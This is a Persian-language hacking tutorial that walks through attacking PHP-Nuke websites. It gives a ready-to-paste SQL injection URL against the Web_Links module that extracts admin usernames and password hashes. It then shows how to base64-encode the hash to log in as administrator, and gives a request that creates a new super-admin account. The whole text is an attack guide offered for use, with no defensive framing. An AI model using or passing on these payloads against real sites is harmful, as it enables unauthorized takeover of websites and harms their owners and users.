رای هک کردن PHP-Nuke  یه سری کد هست که من یه نمونه از کد جدید رو اینجا گذاشتم کدهای جدید رو تو سایتهایی که باگ ها رو منتشر میکنند پیدا کنید ):

modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid%2c1%2cpwd%2c1%20FROM%20nu ke_authors%20/%2a

این کد ها رو باید در اخر اسم سایت کپی کنید ، باید حواستون هم باشه که PHP  تو کدوم شاخه نصب شده. مثلا :

http://www.Site.com/modules.php?nam..._authors%20/%2a

حالا اگه مثلا تو پوشه nuke  نصب شده بود اینجور میشد:

http://www.site.com/nuke/modules.ph..._authors%20/%2a

بعد از اینکارا اگه سایت پچ نشده باشه ( که خدا رو شکر همه اکثرن شدن ) به شما یه یوزر ادمین با یه پسورد هش ( MD5  ) میده . شما باید اون هش رو اینکد کنید.با Base64  که تو قسمت دانلود هست ، دانلود کنید.به این صورت اینکد کنید:

Admin:hash:

بعد که پسورد رو اینکد کردید میرید تو ادرس بار اینو مینویسید:

www.site.com/admin.php?admin=code

به جای admin  یوزر نیم و به جای Code  پسورد هش رو که اینکد کردید بذارید . میبینید که وارد منوی مدیریت میشید. حالا بعد از اینجا شما  2  راه دارید ، یکی اینکه شما با همین ادمین تغییراتی رو که میخواهید ایجاد کنید ، راه دوم هم اینه که واسه خودتون یه ادمین بسازید.

راه اول:

این راه اسون تر از راه دوم هست. وقتی وارد منو مدیر سایت شدید کافیه که بعد از کلیک کردن در هر لینک این رو بعد از لینک تو ادرس بار کپی کنید:

&admin=Code

به جای کد پسورد اینکد شده رو بذارید.

راه دوم :

این راه از اولی یکم سختره. شما باید یه مدیر بسازید ، این ادرس رو کپی کنید بعد از اسم سایت:

admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid
=$nick&add_email=hacker@hacker.com&add_pwd=$pass&admin=$hash";

به جای $nick  ها اسم یوزری که میخواهید بسازید رو بدید. به جای $pass  هم پسوردی که میخواهید بذارید واسه ادمینتون بذارید.به جای $hash  هم پسورد اینکد شده رو بذارید. بعد اینتر کنید اگه موفق شده باشید وارد صفحه لاگین کردن مدیر میشد ، یوزر و پسوردی رو که ساختید لاگین کنید.